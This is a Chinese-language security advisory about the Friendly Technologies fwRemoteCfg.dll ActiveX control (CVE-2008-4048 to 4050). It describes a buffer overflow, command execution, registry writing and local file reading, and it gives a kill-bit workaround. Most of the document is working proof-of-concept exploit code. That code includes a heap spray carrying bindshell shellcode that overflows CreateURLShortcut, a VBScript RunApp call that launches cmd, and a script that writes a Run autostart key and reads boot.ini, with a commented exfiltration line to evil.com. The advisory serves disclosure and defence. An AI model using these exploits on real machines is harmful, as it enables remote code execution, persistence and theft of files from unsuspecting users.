Friendly Technologies fwRemoteCfg.dll控件多个远程漏洞
发布日期:2008-08-30
更新日期:2008-09-01
受影响系统:
Friendly Technologies fwRemoteCfg.dll
描述:
BUGTRAQ ID: 30940,30939,30891,30889
CVE(CAN) ID: CVE-2008-4048,CVE-2008-4049,CVE-2008-4050
Friendly Technologies是一款提供类似L2TP和PPPoE客户端的解决方案。
Friendly Technologies拨号程序所提供的fwRemoteCfg.dll控件(clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B)可以从网页脚本中实例化并调用,但没有正确地验证某些用户提供的参数。如果用户受骗访问了恶意网页,攻击者就可能:通过CreateURLShortcut方法的超长参数触发缓冲区溢出并执行任意代码;通过RunApp方法直接运行任意命令;通过RegistryValue方法读写注册表(例如写入Run自启动项);通过GetTextFile方法读取本地任意文件,泄露敏感信息。
<*来源:spdr (spdr01@gmail.com)
链接:http://secunia.com/advisories/31644/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<title>Friendly Technologies - wayyy too friendly...</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id="sucker"></object>
<input type="button" value="Exploit!" onClick="exploit()">
<script>
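function exploit() {
  // Spray the IE heap with [heap header][NOP sled][shellcode] blocks up to
  // 0x0C0C0C0C, then hand CreateURLShortcut an oversized 3rd argument whose
  // tail is the spray address, so the overwritten control-flow value lands
  // inside a NOP sled. Depends on the `sucker` <object> and MakeNopSlide()
  // defined elsewhere in this page.
  var Evil = ""; // oversized buffer passed to CreateURLShortcut
  // Per the original author, bytes outside 0x00-0x7F in this argument get
  // altered before they reach the control, hence a spray target made of
  // 0x0C bytes instead of a precise pointer to the shellcode.
  var DamnIE = "\x0C\x0C\x0C\x0C";
  // Skyland win32 bindshell (28876/tcp) shellcode
  var ShellCode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
  var payLoadSize = ShellCode.length * 2; // bytes: each UTF-16 code unit is 2 bytes
  var SprayToAddress = 0x0C0C0C0C; // highest address the spray has to reach
  var spraySlide = unescape("%u9090%u9090"); // NOP sled seed
  var heapHdrSize = 0x38; // assumed MSIE heap block header size -- confirm for the target build
  var BlockSize = 0x100000; // 1 MiB per sprayed block
  var SlideSize = BlockSize - (payLoadSize + heapHdrSize); // NOP sled bytes per block
  // Fractional in general; the integer loop index below rounds it up.
  var heapBlocks = (SprayToAddress - 0x100000) / BlockSize;
  spraySlide = MakeNopSlide(spraySlide, SlideSize);
  // Keep the spray array and its index local; the original leaked both as
  // implicit globals, which also breaks under strict mode.
  var memory = [];
  for (var k = 0; k < heapBlocks; k++) {
    memory[k] = spraySlide + ShellCode;
  }
  // 800 filler characters, then the spray address.
  while (Evil.length < 800) {
    Evil += "A";
  }
  Evil += DamnIE;
  // 'con' is a reserved device name, so no shortcut file is actually created.
  sucker.CreateURLShortcut("con", "con", Evil, 1);
}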
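function MakeNopSlide(spraySlide, SlideSize) {
  // Grow the seed NOP pattern by doubling until it covers SlideSize bytes
  // (SlideSize / 2 UTF-16 code units), then trim to exactly that length.
  //   spraySlide: non-empty seed pattern, e.g. unescape("%u9090%u9090")
  //   SlideSize:  target sled size in bytes (each code unit is 2 bytes)
  // Returns the sled string. Throws on an empty seed: doubling "" never
  // reaches SlideSize, so the original would spin forever.
  if (!spraySlide) {
    throw new Error("MakeNopSlide: seed pattern must not be empty");
  }
  var sled = spraySlide;
  while (sled.length * 2 < SlideSize) {
    sled += sled;
  }
  // substring() truncates a fractional SlideSize / 2 toward zero.
  return sled.substring(0, SlideSize / 2);
}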
</script>
</html>
<html>
<object classid='clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B' id='lamers' ></object>
<script language='vbscript'>
' Command execution through the control's RunApp method: the second argument is
' the command line that gets launched; the meaning of the trailing 0 is not
' documented here (presumably a window-style/flags value -- confirm).
Call lamers.RunApp("cmd", "cmd /k echo So Simple, So Lame -- Somebody should get fired.", 0)
</script>
<html>
<title>Friendly Technologies - Read/Write Registry</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id='FT'></object>
<script language='Javascript'>
// Registry read/write and local file read through the FT control.
// The first argument selects the hive and the last one is a flag; neither
// is documented on this page, the values are kept as in the original PoC.
var hive = 1;
var runKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
var dialerKey = "SOFTWARE\\Friendly Technologies\\FriendlyWeb Dialer";
// Write: JScript COM property-put with arguments (an assignment to a call
// expression, which only IE's JScript engine accepts). Writing under Run
// makes the value start on every logon.
FT.RegistryValue (hive, runKey, "Key Name Here", 1) = "Input Here";
// Read back an arbitrary value
var versionValue = FT.RegistryValue (hive, dialerKey, "Version", 1);
alert(versionValue);
// Read an arbitrary local file; a page could exfiltrate it instead of showing it
var bootIni = FT.GetTextFile("c:\\boot.ini");
alert(bootIni); // <img src="http://evil.com/postfiles.php?input="+readme ...
</script>
建议:
厂商补丁:
Friendly Technologies
---------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.friendly-tech.com/default.asp
临时解决方法:在补丁发布之前,可为该控件的CLSID设置kill bit,阻止Internet Explorer加载该控件:在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F4A06697-C0E7-4BB6-8C3B-E01016A4408B}下将Compatibility Flags设为DWORD值0x400;或在IE安全设置中禁止运行ActiveX控件。
